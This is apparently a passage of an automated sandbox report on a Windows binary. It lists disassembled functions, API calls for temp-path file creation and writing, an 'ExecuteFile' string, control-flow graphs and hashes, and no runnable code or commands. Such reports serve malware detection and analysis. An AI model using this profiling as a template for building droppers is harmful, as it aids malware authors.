                                                      • wsprintfW.USER32 ref: 004045BB
                                                      • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: PathTemp$AttributesFilewsprintf
                                                      • String ID:
                                                      • API String ID: 1746483863-0
                                                      • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                      • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                      • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                      • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1397 412525-412563 call 40fc0a 1400 412565 call 4105e9 1397->1400 1401 41256a-412598 call 413350 1397->1401 1400->1401 1401->1400 1405 41259a-4125b9 1401->1405 1406 4127a3-4127a7 1405->1406 1407 4125bf-4125c1 1405->1407 1408 4125c3-4125c7 1407->1408 1409 4125c9-4125cc 1407->1409 1408->1409 1410 4125d1-4125d4 1408->1410 1409->1406 1411 4125d6 1410->1411 1412 4125dd-4125ee 1410->1412 1411->1409 1413 4125d8-4125db 1411->1413 1414 4125f0 1412->1414 1415 4125f7-412606 call 40d041 1412->1415 1413->1409 1413->1412 1414->1409 1416 4125f2-4125f5 1414->1416 1417 412609-41260b 1415->1417 1416->1409 1416->1415 1417->1406 1418 412611-41263c call 40e036 call 40e0d0 1417->1418 1423 41264f-412687 call 413350 1418->1423 1424 41263e 1418->1424 1423->1400 1429 41268d-4126c2 call 411603 call 410684 1423->1429 1425 412640-41264a ??3@YAXPAX@Z 1424->1425 1427 4127a2 1425->1427 1427->1406 1434 4126c4-4126c6 1429->1434 1435 4126cc-4126cf 1429->1435 1434->1435 1436 41276c-4127a0 call 411f01 call 410996 call 4115ca ??3@YAXPAX@Z 1434->1436 1435->1400 1437 4126d5-4126d7 1435->1437 1436->1427 1437->1400 1439 4126dd-4126ff call 411c05 1437->1439 1444 412701-412711 call 410996 call 4115ca 1439->1444 1445 412716-41271a 1439->1445 1444->1425 1448 412733-412737 1445->1448 1449 41271c-41272e call 410996 call 4115ca 1445->1449 1448->1400 1454 41273d-41275e call 4115ca call 411603 call 410684 1448->1454 1449->1425 1454->1400 1466 412764-412766 1454->1466 1466->1400 1466->1436
                                                      APIs
                                                        • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$ExceptionThrow
                                                      • String ID: (nA
                                                      • API String ID: 2803161813-867891557
                                                      • Opcode ID: ff3966214da990f3eec857a7cd77d999631e9245e926d80e80f01dca88b97972
                                                      • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                      • Opcode Fuzzy Hash: ff3966214da990f3eec857a7cd77d999631e9245e926d80e80f01dca88b97972
                                                      • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                      APIs
                                                      • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                      • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AllocExceptionStringThrow
                                                      • String ID: PlA
                                                      • API String ID: 3773818493-1533977103
                                                      • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                      • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                      • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                      • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                      APIs
                                                        • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                        • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                        • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                      • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                      • String ID:
                                                      • API String ID: 1642057587-0
                                                      • Opcode ID: 9c23fe96df16c52cfdc0e27917211dc38b4a934b3376a8ee60c67e892c4a51fc
                                                      • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                      • Opcode Fuzzy Hash: 9c23fe96df16c52cfdc0e27917211dc38b4a934b3376a8ee60c67e892c4a51fc
                                                      • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002F,0000002F,?,00406616,?,00419810,00419810), ref: 00401739
                                                      • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                        • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                        • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                        • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                        • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                      • String ID: ExecuteFile
                                                      • API String ID: 1306139538-323923146
                                                      • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                      • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                      • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                      • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                      • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@memmove
                                                      • String ID:
                                                      • API String ID: 3828600508-0
                                                      • Opcode ID: e48a7097e89ab6672d4a1a829cf17096e5af604aff4887b8903ddd17a75771b8
                                                      • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                      • Opcode Fuzzy Hash: e48a7097e89ab6672d4a1a829cf17096e5af604aff4887b8903ddd17a75771b8
                                                      • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID: @
                                                      • API String ID: 1890195054-2766056989
                                                      • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                      • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                      • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                      • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID: lA
                                                      • API String ID: 613200358-262130271
                                                      • Opcode ID: 2706d47d74be015093c695225981c79f86210060680c130189faf4ccf942951b
                                                      • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                      • Opcode Fuzzy Hash: 2706d47d74be015093c695225981c79f86210060680c130189faf4ccf942951b
                                                      • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@H_prolog
                                                      • String ID:
                                                      • API String ID: 1329742358-0
                                                      • Opcode ID: f1ab54605b7dccf154231dcdf4c392f830e7fdbf20b031498a990c1a6211f4ff
                                                      • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                      • Opcode Fuzzy Hash: f1ab54605b7dccf154231dcdf4c392f830e7fdbf20b031498a990c1a6211f4ff
                                                      • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@
                                                      • String ID:
                                                      • API String ID: 1936579350-0
                                                      • Opcode ID: 0d4d44cd39c449b8db83f9a0a129db4cf4655da94f728f0a6be5068cdd24361d
                                                      • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                      • Opcode Fuzzy Hash: 0d4d44cd39c449b8db83f9a0a129db4cf4655da94f728f0a6be5068cdd24361d
                                                      • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@
                                                      • String ID:
                                                      • API String ID: 1936579350-0
                                                      • Opcode ID: 7e6ba89204f8a758a8eee98ad7a5cb7fb7c45ca2aa42c986b371a9c0fd43346b
                                                      • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                      • Opcode Fuzzy Hash: 7e6ba89204f8a758a8eee98ad7a5cb7fb7c45ca2aa42c986b371a9c0fd43346b
                                                      • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer
                                                      • String ID:
                                                      • API String ID: 2976181284-0
                                                      • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                      • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                      • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                      • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                      • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                      • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                      • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                      • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                      • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                      • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                      APIs
                                                      • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                      • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                      • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                      • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                      APIs
                                                        • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateFileHandle
                                                      • String ID:
                                                      • API String ID: 3498533004-0
                                                      • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                      • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                      • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                      • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                      APIs
                                                      • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                      • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                      • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                      • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: _beginthreadex
                                                      • String ID:
                                                      • API String ID: 3014514943-0
                                                      • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                      • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                      • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                      • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                      APIs
